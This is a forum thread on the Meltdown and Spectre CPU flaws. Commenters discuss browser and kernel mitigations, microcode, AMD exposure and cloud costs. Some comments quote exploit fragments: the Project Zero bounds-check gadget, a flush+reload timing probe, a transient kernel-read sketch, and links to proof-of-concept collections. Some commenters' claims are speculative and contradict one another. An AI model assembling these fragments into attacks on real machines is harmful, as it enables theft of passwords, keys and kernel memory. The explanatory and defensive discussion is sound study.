This month's stable Chrome release will be outright disabling SharedArrayBuffer until additional mitigations are enacted.


Which sucks for people who've built sites which rely on it.

It isn't exactly polyfillable.


That shouldn't be that many sites. It only hit Chrome stable in July 2017; Firefox in August 2017; and Edge November 2017.


I believe SAB is being disabled, and apparently precision of performance.now() as well? (based on other comments)


about:config javascript.options.shared_memory in Firefox.


Turned off by default for me in 57.0.3/macOS. Is it usually on by default on other platforms?


Just checked on Windows and it was on by default for me for Firefox 57.0.3


Doesn't each tab run in a separate process?


That's true to first approximation in Chrome, but apparently not always.

This recent article contains a bit more detail on Site Isolation: https://arstechnica.com/gadgets/2017/12/chrome-63-offers-eve...

> Chrome's default model is, approximately, to use one process per tab. This more or less ensures that unrelated sites are kept in separate processes, but there are nuances to this set-up. Pages share a process if they are related through, for example, one opening another with JavaScript or iframes embedding (wherein one page is included as content within another page). Over the course of a single browsing session, one tab may be used to visit multiple different domains; they'll all potentially be opened within a single process. On top of this, if there are already too many Chrome processes running, Chrome will start opening new pages within existing processes, resulting in even unrelated pages sharing a process.

Which suggests there are a number of cases where multiple tabs could share a process.


Note that it's not just tabs sharing processes that's an issue: prior to the site isolation work, any iframe in the same page would always be in the same process as the main frame. With site isolation, it's possible to host cross-site [1] iframes in a separate process.

[1] Two pages are considered cross-site if they cannot use document.domain to become same-origin. In practice, this means that the effective TLD + 1 components match.


Chrome starts putting multiple tabs in the same process once certain resource thresholds are reached. There's an experimental "site isolation" option that you can toggle on to enforce this better, currently with some caveats: https://www.chromium.org/Home/chromium-security/site-isolati... .

Curious to know whether Firefox has anything similar in the pipe, since it uses a fixed number of content processes rather than a variable number of processes.



This is so incredibly bad. Spectre is basically unpatchable. We can do better than we are now with patches but it's all just turd polishing, essentially. A proper fix will require new CPU hardware. And as a kicker? Leaks are basically undetectable.


New CPU microcode is enough, though at a performance price. On pre-Zen AMD there is also a chicken bit to disable indirect branch prediction. (It feels good to be finally able to speak about this freely!!!)

I don't know for which processors Intel and AMD plan to release microcode updates.


> New CPU microcode is enough

What would that entail? Disabling speculation completely? Disabling memory accesses during speculation?


Disabling indirect branch prediction (and thus speculation after indirect branches) while in kernel mode, or flushing the indirect branch predictor on kernel mode entry. Both need OS support in addition to the microcode, but the change is less invasive than PTI.


That only fixes one variant of Spectre, and only for code running in kernel mode.

The "out of bounds" Spectre variant is still feasible.

Also: What about hyperthreads? It seems to be many people's assumption that the BTB is shared within a physical core.


The out-of-bounds variant is fixable in the OS: just add a fence instruction between the check and the load.
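
In C with intrinsics, that fence looks roughly like this (a sketch; on x86 the barrier is LFENCE, which keeps the load from executing until the bounds check has actually resolved):

    #include <stddef.h>
    #include <stdint.h>
    #include <x86intrin.h>

    uint8_t safe_read(const uint8_t *data, size_t len, size_t idx) {
        if (idx < len) {
            _mm_lfence();   /* speculation barrier between check and load */
            return data[idx];
        }
        return 0;
    }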

For code running in user mode, you flush the branch predictor on each context switch---again, new microcode + patched OS.

Hyperthreads are tricky. Those are not yet fixed by microcode AIUI, and in the future you may want a usermode program to say "I don't want indirect branch prediction because I am afraid of what the other hyperthread might do to me". That would require some new system call (like a new prctl on Linux) or something like that.


Great. Now we just have to think of new attacks using the same general idea to slow down all computers by yet another 10% :p


Wouldn't that be a serious performance hit?


It is. Same ballpark as PTI on microbenchmarks, but a little better on macrobenchmarks.


Getting flashbacks of brainsmoke's JS PoC: https://youtu.be/ewe3-mUku94?t=1766

Edit: Also, PoCs for unpatched Windows by pwnallthethings: https://github.com/turbo/KPTI-PoC-Collection


I do also wonder if some speculative prediction / branching stuff can be controlled through undocumented CPU instructions: https://www.youtube.com/watch?v=KrksBdWcZgQ



"As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs"

I am not sure what "the process in which it runs" means here ... do they mean private memory from within chrome ? Or within the child process spawned from chrome, or within the spawned JS sandbox or ... what ?

Practically speaking, I worry about a browser pageview that can read memory from my terminal process. Or from my 'screen' or 'sshd' process.

I think that is not a risk here, yes ?


Will it be nontrivial to detect or at least identify these types of exploits as they occur in the wild? Can protection software see these when they happen, assuming a best case scenario where the attack is carried out but doesn't specifically use these methods to hide or disable detection? Is there a general sense yet of whether this exploit is already being leveraged?


Thanks for the links. As an undergrad with limited knowledge of this subject, I would love to see these annotated on Fermat's Library (https://fermatslibrary.com)


Guys, can't we just detect a program doing Spectre-like behavior and kill it, instead of having every other application suffer a performance hit from the proposed changes? Antivirus software already does similar stuff.


"AMD chips are affected by some but not all of the vulnerabilities. AMD said that there is a "near zero risk to AMD processors at this time." British chipmaker ARM told news site Axios prior to this report that some of its processors, including its Cortex-A chips, are affected."

- http://www.zdnet.com/article/security-flaws-affect-every-int...

Edit:

From https://meltdownattack.com/

Which systems are affected by Meltdown?

"Desktop, Laptop, and Cloud computers may be affected by Meltdown. More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995 (except Intel Itanium and Intel Atom before 2013). We successfully tested Meltdown on Intel processor generations released as early as 2011. Currently, we have only verified Meltdown on Intel processors. At the moment, it is unclear whether ARM and AMD processors are also affected by Meltdown.

Which systems are affected by Spectre?

"Almost every system is affected by Spectre: Desktops, Laptops, Cloud Servers, as well as Smartphones. More specifically, all modern processors capable of keeping many instructions in flight are potentially vulnerable. In particular, we have verified Spectre on Intel, AMD, and ARM processors."


Looks like everyone is vulnerable to arbitrary user memory reads, while Intel and ARM are vulnerable to arbitrary kernel memory reads as well.


Thanks for clarifying Mike, should be interesting to see how this actually pans out.


Not just user memory reads. AMD CPUs won’t speculate loads from userland code directly to kernel memory, ignoring privilege checks (“Meltdown”). But they are still subject to the “Spectre” attack, which can disclose kernel memory by taking advantage of certain code patterns (which normally would be harmless) in kernel code.


But that means the root user, or someone with effective root privs or CAP_*, has to load programs into a kernel interpreter or kernel JIT. If you've given someone permission to do this from a user process, you've probably opened yourself up to more mundane issues. I suspect this is why AMD says the risk is near zero: if you've given away the keys to the kernel, you're already in trouble.

AMD's ASID blocks the issues for VM guests (and root users on VM guests).


For variant 1, a kernel JIT is definitely helpful, which is why the Project Zero PoC used it, but it's not required.

For variant 2, Project Zero used the eBPF interpreter as a gadget, a fake branch destination, without having to actually create an eBPF program or use the normal userland-facing eBPF APIs at all. And they only chose it as the least "annoying" option (see quote below).

edit: I'm not sure how ASID support would mitigate either of those variants, though there may be something I'm not thinking of. (It would help with variant 3, but that's the variant AMD wasn't vulnerable to in the first place.)

quote:

> At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.


To make it a bit clearer how this works: the Variant 2 exploit poisons the branch target buffer to cause the processor's speculative execution in kernel space to jump to an entirely attacker-controlled destination when it hits a branch that matches the information the attacker has placed into the BTB. The actual retired instructions don't go this way of course - the processor detects the misprediction and goes back to execute the real code path - but the speculatively executed path still leaves evidence behind in the caches.


But somehow you have to get that kernel address in the first place in order to alias it in the BTB. How do you get that without root?


They test how a series of branches are predicted after returning from a hypercall, which lets them basically dump out the state of the BTB. From that, and knowledge of where the branches are in the hypervisor binary (the binaries themselves aren't really a secret, only the relocated load address is) they can figure out the load address of the hypervisor.

See the section "Reading host memory from a KVM guest / Locating the host kernel". It's terribly clever.


But if you use AMD's ASID, it blocks this, as memory mappings for VM guests are in a completely separate address space.

What I was wondering about was local OS user mode to local OS root/kernel mode access, i.e. user-to-kernel privilege escalation.


It isn't obvious at all how a separate address space would block that method.

What would block it is flushing the branch predictor state when switching privilege levels and/or address spaces.


I've tried reading it and I still find all of this very confusing. Could you ELI5?


You boot up your own copy of Ubuntu LTS-whatever and read the address of it as root.

KASLR is not enabled everywhere, and where it is, there are other attacks to defeat it, which are mentioned in the paper.


I'm not sure I see how to use the Spectre attack on AMD without running in kernel context. What am I missing?


I should clarify I mean user to root privilege escalation.

I totally understand how the breaking-out-of-the-JavaScript-sandbox attack works, and the fact that PTI won't help with that. With Linux's clone(), you could clone without CLONE_VM and use CLONE_NEWUSER|CLONE_SYSVSEM, then unmap everything except the JavaScript interpreter / JIT, leave a shared memory map, and communicate only via the shared memory map and SysV semaphores for synchronisation. Obviously this wouldn't be available on other platforms.


By "user to root privilege escalation", I'll assume you mean leaking kernel data without root, since this attack doesn't directly allow escalating privileges at all.

For variant 1, you would need to find some legitimate kernel code, accessible by syscall, that looks at least somewhat similar to the example in the Project Zero blog post:

    if (untrusted_offset_from_caller < arr1->length) {
        /* this read can execute speculatively with an out-of-bounds
           offset while the bounds check above is still in flight */
        unsigned char value = arr1->data[untrusted_offset_from_caller];
        /* derive a second index from the (possibly secret) value */
        unsigned long index2 = ((value&1)*0x100)+0x200;
        if (index2 < arr2->length) {
            /* this load warms a value-dependent cache line, which a
               later timing probe can detect */
            unsigned char value2 = arr2->data[index2];
        }
    }
In practice, you may not be able to find something nice like "((value&1)*0x100)+0x200", but even if it simply used 'value' as an index, you would be able to at least narrow it down to a range. Other code patterns may work too (and potentially be more powerful?), e.g. conditional branches based on 'value'.

For variant 2, see caf's answer to you in another thread.


>>> By "user to root privilege escalation", I'll assume you mean leaking kernel data without root, since this attack doesn't directly allow escalating privileges at all.

The attack allows reading all the memory. Isn't there a way to scan for passwords or SSH keys and turn that into a privilege escalation?


Sure, SSH keys would probably work on a system with SSH enabled; I just wouldn't count that as "directly". (That would include most servers but exclude most Android devices; I have no idea whether there are other escalation methods for Android.)


Direct or indirect is meaningless at this point. The exploit is proven, they just have to determine the "best" memory locations to read to make something "useful" out of it. Then it's bundled together as an exploit kit and it's Armageddon.


> For variant 1, a kernel JIT is definitely helpful, which is why the Project Zero PoC used it, but it's not required.

If I'm understanding the post correctly it says that JIT's not required for Intel CPUs, but is required for AMD.


Their particular exploit for variant 1, which uses eBPF, only worked on AMD with the eBPF JIT, i.e. it did not work with the eBPF interpreter. But there are many other potential avenues to exploit that variant which have nothing to do with BPF. The result does suggest that it may generally be harder to trigger variant 1 on AMD processors (because they don't speculate as much?), but harder ≠ impossible.


Ah ok, thanks for clarifying.


Do you need root or comparable privileges to take advantage of BPF? I did not think that was the case. My understanding was that BPF code executes within the kernel.

BPF is employed by the `bpf()` syscall for socket packet filtering, as well as by `seccomp` itself for its syscall filtering. Is this threat vector not available to untrusted processes?


iirc I think that the BPF JIT is disabled by default? Your kernel might be compiled with `CONFIG_BPF_JIT`, but I think the sysctl knob (`bpf_jit_enable`) is set to 0 by default. Also there's a sysctl for unprivileged BPF called `unprivileged_bpf_disabled`. On my system it seems to default to 0.

https://elixir.free-electrons.com/linux/v4.15-rc6/source/ker...


That article links a commit [1] that contradicts this statement

> AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against. The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault.

And Axios [2] that Zdnet quotes gave a comment from AMD:

> "To be clear, the security research team identified three variants targeting speculative execution. The threat and the response to the three variants differ by microprocessor company, and AMD is not susceptible to all three variants. Due to differences in AMD's architecture, we believe there is a near zero risk to AMD processors at this time. We expect the security research to be published later today and will provide further updates at that time."

And a comment from ARM:

> Please note that our Cortex-M processors, which are pervasive in low-power, connected IoT devices, are not impacted.

[1] https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/...

[2] https://www.axios.com/how-the-giants-of-tech-are-dealing-wit...


My read is that vulnerable processors generally have to:

1. Have out of order execution

2. Have aggressive speculative memory load / caching behavior

3. Be able to speculatively cache memory not owned by the current process (either kernel or otherwise)

4. Have deterministic ways of triggering a speculative load / read to the same memory location

2 is probably the saving grace in ARM / low power land, given they don't have the power budget to trade speculative loads for performance (in the event they're even out of order in the first place).

Caveat: I'm drinking pretty strong Belgian beer while reading through these papers.


How does that pertain to the vulnerabilities that involve eBPF? My understanding is that eBPF code executes within the kernel, and so would run at the same privilege level.


"Intel suffers a Meltdown" should be an apt headline for tomorrow's headlines.


Another good article: https://www.theregister.co.uk/2018/01/02/intel_cpu_design_fl...

"AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against. The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault."


Google's post is newer and has more insights; the Register article is now outdated.


The Register has more details. Worth a read.


The Google site has the actual white papers detailing the attacks.


The Register has the tweet with actual code for Spectre, and more details from the manufacturers and potential fixes. Seriously? They're both worth a read.


I think the point is that your quoted section of the reg article is not correct according to the new information from Google.


@lern_too_spel

The AMD engineer could be right if he's talking about Ryzen, and/or he isn't addressing user-user and user-kernel boundaries.

AMD isn't affected in nearly the same way as Intel/ARM are: https://twitter.com/ryanshrout/status/948683677244018689


Yeah that's a good one, hope they keep it updated / link to new info / posts as they come out.


Hard to find a good spot for this, but: thanks to everyone involved! From grasping the magnitude of this vulnerability to coordinating it with all major OS vendors, including open-source ones that do all of their work more or less "in the open", it's almost a miracle that the flaw leaked "only" a few days before the embargo ended - and we'll all have patches to protect our infrastructure just in time.

Interestingly, it also put the LKML developers into an ethical grey zone, as they had to deceive the public into believing the patch was actually fixing something else (they did the good and right thing there, IMHO).

Despite all the slight problems along the way, kudos to all of the white hats dealing with this mess over the last months and handling it super gracefully!


Consider how many other such "gray" patches could already be in the kernel ;)


I'm not that savvy with security so I need a little help understanding this. According to the google security blog:

> Google Chrome

> Some user or customer action needed. More information here (https://support.google.com/faqs/answer/7622138#chrome).

And the "here" link says:

>Google Chrome Browser

>Current stable versions of Chrome include an optional feature called Site Isolation which can be enabled to provide mitigation by isolating websites into separate address spaces. Learn more about Site Isolation and how to take action to enable it.

>Chrome 64, due to be released on January 23, will contain mitigations to protect against exploitation.

>Additional mitigations are planned for future versions of Chrome. Learn more about Chrome's response.

>Desktop (all platforms), Chrome 63:

> Full Site Isolation can be turned on by enabling a flag found at chrome://flags/#enable-site-per-process.

> Enterprise policies are available to turn on Site Isolation for all sites, or just those in a specified list. Learn more about Site Isolation by policy.

Does that mean that if I don't enable this feature using chrome://flags (and tell my grandma to do this complicated procedure), I (or she) will be susceptible to getting our passwords stolen?


It probably means if you want mitigations right now, you can flip that flag. Otherwise wait for Chrome to auto-update with new versions that have mitigations enabled by default.


Would I be correct in assuming a browser-level mitigation isn't necessary if you're running a patched OS?


The OS patch stops you trivially reading kernel space from user space (i.e. without eBPF, as in the Project Zero example). You can still cause leakage within the same context: for example, the V8 JIT can read all of the process's memory, and without site isolation that can include data from other web pages - passwords, cookies, etc.


Your OS needs patching, as does any program which handles secret stuff like passwords, cookies, or tokens and interacts with the internet (i.e. web browsers).


Wasn't there a PoC for a second issue of js reading memory from its own process? Could potentially be an issue (eg reading data from another website)


no


From a recently posted patch set:

Subject: Avoid speculative indirect calls in kernel

Any speculative indirect calls in the kernel can be tricked to execute any kernel code, which may allow side channel attacks that can leak arbitrary kernel data.

So we want to avoid speculative indirect calls in the kernel.

There's a special code sequence called a retpoline that can do indirect calls without speculation. We use a new compiler option -mindirect-branch=thunk-extern (gcc patch will be released separately) to recompile the kernel with this new sequence.

We also patch all the assembler code in the kernel to use the new sequence.
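For the curious, the retpoline thunk has roughly this shape (sketched here as a GNU C asm block for the %rax case; the exact sequence varies across patch revisions):

    /* Rough shape of the retpoline thunk for an indirect call through %rax. */
    asm(
        ".global __x86_indirect_thunk_rax\n"
        "__x86_indirect_thunk_rax:\n"
        "    call 1f\n"           /* pushes the address of the pause loop as the return address */
        "2:  pause\n"             /* speculation is captured here and spins harmlessly */
        "    jmp 2b\n"
        "1:  mov %rax, (%rsp)\n"  /* overwrite the return address with the real target */
        "    ret\n"               /* 'returns' to *%rax, bypassing indirect branch prediction */
    );

The trick is that the CPU's return-stack predictor sends speculation into the harmless pause loop, while the architectural path overwrites the return address and `ret`s to the real target, so the attacker-trained branch target buffer is never consulted.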


Link?


Text and patch start here: https://lkml.org/lkml/2018/1/3/780

Also, see Linus' response here: https://lkml.org/lkml/2018/1/3/797


Ahh Linus, never change.



"Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at"

Does anyone have any color/details on how this came to be? A major fundamental flaw exists that has affected all chips for ~10 years, and multiple independent groups discovered it at roughly the same time this past summer?

My hunch is that someone published some sort of speculative paper / gave a talk ("this flaw could exist in theory") and then everyone was off to the races.

But would be curious if anyone knows the real version?



Jann Horn's results & report pre-date the blog post though. The topic was "ripe", so to speak, so multiple parties investigated it at roughly the same time.


Yeah, the blog post says they knew since June 2017, with that blog post being from July.

> This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh's work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-....


AIUI, Anders Fogh has collaborated with people at TU Graz on various occasions previously: I'd assume they already knew about his work prior to the blog post.


There was a paper, "A Javascript Side-Channel Attack on LLC", in 2015 which seems similar to me; maybe it drove some research toward timing/caching mechanisms at the CPU level and their exploitation with a 'side channel' attack.


Considering it affects most CPUs from the last decade (or even the last two), shouldn't they have delayed it a little longer, so that not only cloud businesses but also more mainstream companies got time to deploy patches and tests?


Azure's response: https://azure.microsoft.com/en-us/blog/securing-azure-custom...

This part is interesting considering the performance concerns:

"The majority of Azure customers should not see a noticeable performance impact with this update. We’ve worked to optimize the CPU and disk I/O path and are not seeing noticeable performance impact after the fix has been applied. A small set of customers may experience some networking performance impact. This can be addressed by turning on Azure Accelerated Networking (Windows, Linux), which is a free capability available to all Azure customers."


Disclosure: I work on Google Cloud.

If you run a multitenant workload on a Linux system (say you're a PaaS, or even just hosting a bunch of WordPress sites side by side) you should update your kernel as soon as is reasonable. While VM-to-VM attacks are patched, I'm sure lots of folks are running untrusted code side by side and need to self-patch. This is why our docs point this out for, say, GKE: we can't be sure you're running single-tenant, so we're not promising you there's no work to do. Update your OSes, people!


No offence intended as I'm sure it's a bit of a madhouse there right now, but is your statement really correct? I read the Spectre paper quite carefully and it appears to be unpatchable. Although the Meltdown paper is the one that conclusively demonstrated user->kernel and vm->vm reads with a PoC, and Spectre "only" demonstrated user->user reads, the Spectre paper clearly shows that any read type should be possible as long as the right sort of gadgets can be found. There seems no particular reason why cross-VM reads shouldn't be possible using the Spectre techniques and the paper says as much here:

For example, if a processor prevents speculative execution of instructions in user processes from accessing kernel memory, the attack will still work.

and

Kernel mode testing has not been performed, but the combination of address truncation/hashing in the history matching and trainability via jumps to illegal destinations suggest that attacks against kernel mode may be possible. The effect on other kinds of jumps, such as interrupts and interrupt returns, is also unknown

There doesn't seem to be any reason to believe VM-to-VM attacks are either patched or patchable.

My question to you, which I realise you may be unable to answer - how much does truly dedicated hardware on GCE cost? No co-tenants at all except maybe Google controlled code. Do you even offer it at all? I wasn't able to find much discussion based on a 10 second search.


Sorry for the confusion.

I have been most focused on people being concerned that a neighboring VM could suddenly be an attacker. You're right that the same kind of thing that affects your JavaScript engine as a user affects say Apache or anything that allows requests from external sources. However, that situation already has a much larger attack surface and people in that space should be updating themselves whenever there's any CVE like this.

My concern was that the Azure announcement made it sound like they've done the work, so nothing is required. That's not strictly true, even though providers have mitigated one set of attacks at the host kernel layer, so I wanted to correct that.


I'm not sure about GCE but in Azure often the largest node size in a particular family (i.e. D15_v2, G5, M128, etc.) is isolated / dedicated to a single customer.


Interesting that they left it this late.


Disclosure: I work on Google Cloud.

Like the AWS reboots, people will notice. So in the interest of the embargo, both Azure and AWS waited to update as late as they felt was safe. Since we do live migrations and host kernel updates all the time, nobody noticed us :).


Someone correct me if I understood this wrong. The way they are exploiting speculative execution is to load values from memory regions which they don't have permission to access into a cache line, and when the speculation is found to be false, the processor does not undo the change to the cache line?

The question is, how is the speculative write going to the cache in the first place? Only retired instructions should be able to modify cache lines AFAIK. What am I missing?

Edit: Figured it out. The speculatively accessed memory value is used to compute the address of a load from a memory location which the attacker does have access to. Once the mis-speculation is detected, the attacker times accesses to the memory which was speculatively loaded and figures out what the secret value is. Brilliant!
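Concretely, that timing step is a flush+reload probe. A minimal sketch (illustrative names - probe[] stands in for the attacker-accessible array the speculative load indexed into):

    #include <stdint.h>
    #include <x86intrin.h>

    #define STRIDE 4096                  /* one page per value, to sidestep the prefetcher */
    static uint8_t probe[256 * STRIDE];  /* the attacker-accessible array */

    /* After the speculative load has run, the probe line for the secret byte
     * is hot; the fastest load below reveals which one. */
    static int recover_byte(void) {
        int best = -1;
        uint64_t best_time = ~0ULL;
        unsigned aux;
        for (int guess = 0; guess < 256; guess++) {
            volatile uint8_t *p = &probe[guess * STRIDE];
            uint64_t t0 = __rdtscp(&aux);
            (void)*p;                             /* timed load */
            uint64_t dt = __rdtscp(&aux) - t0;
            if (dt < best_time) { best_time = dt; best = guess; }
            _mm_clflush(&probe[guess * STRIDE]);  /* evict it again for the next round */
        }
        return best;
    }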


Important to note that at this point they're only reading one bit at a time from kernel memory, but it could probably be changed to read more - exactly how many branches it could compare before the mis-speculation is detected is not discussed, and that could be an area for large speedups in the attack.


Wow, what a find for the Project Zero team. This team and idea can only be described as a success, well done.


"These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running them."

Curious. All other reports I've read state that AMD CPUs are not vulnerable.


See the Twitter thread here: https://twitter.com/nicoleperlroth/status/948678006859591682

(Edit: there are 9 posts total, go to her user page to see them all)

Seems there are two issues. One, called Meltdown, only affects Intel and is REALLY bad, but the kernel page table changes everyone is making fix it.

The other, dubbed Spectre, is apparently common to the way all processors handle speculative execution and is unfixable without new hardware.

I’d like to know more about that but I haven’t seen anything yet.

Whoever discovered this stuff on Google’s team deserves some sort of computer security Nobel prize.


That's not even close to a thread...

You can see all the tweets here (courtesy of @svenluijten): https://twitter.com/i/moments/948681915485351938.


After reading that thread, I sort of wonder if this is the catalyst for the next tech bust. Prices on the basic building block of the modern tech industry (a server shard) going up 30%, or even more as shared/virtual services must be decommissioned for isolation? Surely it's an alarmist thing to think and I don't think it's likely, but if you had asked me yesterday the likelihood of an underlying security vulnerability affecting every processor since 1995, I'd have said probably not.

Major props to the teams working on this... now time for us all to hold onto our pants as we ask for budget increases that will make shareholders demand blood.


Would be interesting to look at public companies where server costs going up 20% would kill their profit margins.


I don't think this is likely anywhere.

The only sorts of companies where server costs could increase hugely due to a sudden need for hardware isolation are those where they're running tiny or incredibly bursty workloads. Big companies like Netflix that use tons of cores can just binpack their work all together on the same hardware so their jobs only share hardware with other jobs controlled by the same company. Effectively, cloud providers will start offering sub-clouds into which only your own jobs will be scheduled.

This is actually how cloud tech has worked for many years internally. I worked at Google for a long time and their cluster control system (Borg) had a concept called "allocs" which were basically scheduling sub-domains. You could schedule an alloc to reserve some resources, and then schedule jobs into the alloc which would share those resources. Allocs were often used to avoid performance-related interference from shared jobs, e.g. when a batch job kept hogging the CPU caches and slowing down latency sensitive servers. I suppose these days VMs and containers do a similar job, though I think the Borg approach was nicer and more efficient.

I guess this sort of per-firm isolation will become common and most companies' costs won't change a huge amount. The people it'll hit will be small mom-and-pop personal servers, but they're unlikely to care about side-channel attacks anyway. So I wouldn't sell stock in cloud providers just yet.


The linked thread suggests that Spectre doesn't have _any_ mitigation.

> The business/economic implications are not clear, since eventually the only way to eradicate the threat posed by Spectre is to swap out hardware.

Is this fully accurate - is there really no software mitigation available now?

From [0], the above may be true:

> There is also work to harden software against future exploitation of Spectre, respectively to patch software after exploitation through Spectre.

There is 'work'? No current patch? So Spectre is unpatched?

This point doesn't seem to be being highlighted but appears particularly important.

[0] https://meltdownattack.com/#faq-fix


Yes, from my understanding, Spectre is an architectural-level flaw in the so-called speculative execution unit. In other words, Spectre will only be fixed once Intel, AMD, and ARM redesign the unit and release new processors. Given the timelines of CPU design, this will take 5-10 years at least.

On the positive side, the flaw is very difficult to exploit in a practical setting.


> On the positive side, the flaw is very difficult to exploit in a practical setting.

Is it?

"As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs"


So is this fixable or not?



There are possible mitigations for cloud providers: 1) pay $x/hour and run on a shared machine with the possibility of an attack; 2) pay $y/hour (where x < y) and run all your processes on dedicated machines without anybody else.

Moreover, option 2) already exists for large customers and security-sensitive applications (e.g. the dedicated CIA cloud built by Amazon).


Amazon instances can be created with the dedicated flag. The host hardware will be dedicated to you, not shared with any other users. It should mitigate the attack.

The flag has a fixed fee in the thousands of dollars, and each instance is 10% more expensive.


I didn’t find out there were more than 4 posts until after I made my comment (thus the edit).

Thanks for the handy link.


I can't really see how it would be fixable even with new hardware.

Speculative execution is fundamental to getting decent performance out of a CPU. Without it you should probably divide your performance expectations by 5 at least.

Rolling back all state, rather than just user-visible state, in the CPU is nigh on impossible. When you evict something from the cache, you delete it. Undeleting is hard. There are also a lot of other non-user-visible bits of state in a CPU.


I agree that we'll probably see new attacks in this area for a long time.

That said, the main new ingredient of Spectre seems to be the idea that userspace can poison the branch target buffer to cause speculative execution of arbitrary code in kernel space. That part of the attack should be fairly easy to mitigate with new hardware, by XORing (or hashing) the index into the BTB with a configurable value that depends on the privilege level. So each process has its own "nonce", and they're all different from the kernel's.

Then BTB poisoning won't work unless the attacker knows its own and the other context's nonce. Even if further attacks are found that leak this nonce, they could be mitigated by changing the nonce at regular intervals.
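In C-style pseudocode the idea might look like this (purely hypothetical - BTB_ENTRIES and the whole indexing scheme are illustrative, not any shipping design):

    #include <stdint.h>

    #define BTB_ENTRIES 4096  /* assumed table size; a power of two for masking */

    /* Hypothetical index computation: mix a per-context nonce into the branch
     * PC before truncating to the table index, so training done in one context
     * says nothing about which slots another context will hit. */
    static inline uint32_t btb_index(uint64_t branch_pc, uint64_t context_nonce) {
        return (uint32_t)((branch_pc ^ context_nonce) & (BTB_ENTRIES - 1));
    }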


Couldn't you do something like have a separate chunk of "speculative cache" which you only commit to the main cache once the speculatively-executed instructions are retired? Sounds complex, sure - but it seems like that would give you the performance benefits of speculative execution while still being able to roll back (or prevent in the first place) any cache-state side effects when branches were mispredicted. Could also imagine processors start segregating cache by privilege level.

I guess part of the question you're raising is: are there so many different caches, translation buffers, etc. in a modern CPU that keeping 'uncommitted buffers' for the state of all of them would be just as complex as throwing a whole other core in there?


No, that would not be enough. CPUs speculatively execute across multiple branches. Even if you had a separate speculative cache for every code path, you could still build a side-channel from the amount of contention. [1]

[1] https://eprint.iacr.org/2016/613.pdf

> Both hardware thread systems (SMT and TMT) expose contention within the execution core. In SMT, the threads effectively compete in real time for access to functional units, the L1 cache, and speculation resources (such as the BTB). This is similar to the real-time sharing that occurs between separate cores, but includes all levels of the architecture. [...] SMT has been exploited in known attacks (Sections 4.2.1 and 4.3.1)


Possibly - but that's an entirely new processor design. That would take years to get released and adopted.

The scary thing is that you can't fix this in software.


It effectively means wiping the caches, TLBs, BTBs, and any other caches and optimisations on any form of context switch, as far as I can see - which, yes, will likely require new silicon.


> computer security Nobel prize

While they're not as big of a deal AFAIK, we do have the Pwnie Awards: https://pwnies.com/


We should have an annual vulnerability/amelioration award (the Cerberus?) and give one to those guys.


You can find the details below. They've tried AMD CPUs also.

https://googleprojectzero.blogspot.com/2018/01/reading-privi...


"We reported this issue to Intel, AMD and ARM on 2017-06-01"

What!


You know it's a bad one when Project Zero allows more than its usual 90-day deadline...


"Which systems are affected?" – "All systems." – "Come again?"


From the FAQ on spectreattack.com:

> Q: Am I affected by the bug?

> A: Most certainly, yes.

Scary.


If you're using an in-order processor (a Nexus 9 tablet, say), then you should be safe.


I wasn't thinking straight last night. Basically all in-order application processors use speculative execution.


Even a low-power core like a Cortex-M7 can do some speculative execution through its branch predictor.

Though of course an M7 isn't running VMs, and probably isn't running any kind of attacker-controlled code (scripting included - it's there, but rare), so many of the vectors aren't present.


Then they front-ran the negotiated timeline anyway, catching projects like Xen off guard, it seems [0]. Will be interested to read the postmortem of the entire process from start to finish, and Xen is promising one from their perspective. I'd be especially interested to understand whether public intel was concrete enough to justify rushing this out the door, because it didn't seem like it was, but I probably missed something.

[0]: https://xenbits.xen.org/xsa/advisory-254.html


I reimplemented variant 3 based solely on clues from twitter posts yesterday.

I am by no means a computer security guru - I just did a CPU architecture course at uni and figured I'd cowboy up an implementation. It worked nearly first time, and can read both kernel and userspace pages from userspace by fooling the branch predictor into going down the wrong path and relying on the permission checks being slower than the data reads from a virtually addressed cache. It can only access stuff that's already cached, though, so you can't do a full memory dump with it.
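The transient sequence at the heart of this class of attack is tiny. A rough sketch (illustrative names; a real PoC also needs fault suppression - a signal handler, TSX, or exactly the mispredicted-branch trick described above - plus the flush+reload timing step from elsewhere in the thread):

    #include <stdint.h>

    extern uint8_t probe[256 * 4096];  /* illustrative flush+reload array */

    /* The load of *kernel_addr architecturally faults, but the dependent probe
     * access can execute first under speculation, leaving a secret-dependent
     * line in the cache for the timing step to find. */
    static void transient_read(const uint8_t *kernel_addr) {
        uint8_t secret = *(volatile const uint8_t *)kernel_addr; /* faults on retire */
        (void)*(volatile uint8_t *)&probe[secret * 4096];        /* transient encode */
    }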


Speculation was apparently hitting very close to home, allowing attackers with resources (think nation states) to start developing their own tooling. At least this early announcement allows people with sensitive data to quickly move to dedicated instances.

edit: well, it didn't take a nation state after all: https://twitter.com/brainsmoke/status/948561799875502080 - given that, you can be sure that everybody who counts is frantically launching these on your clouds, gathering whatever they can.


How much in advance do the Intel managers have to register a stock sale?


The CEO dropped his stock holdings down to the minimum allowed by their board bylaws in December.

https://www.fool.com/investing/2017/12/19/intels-ceo-just-so...


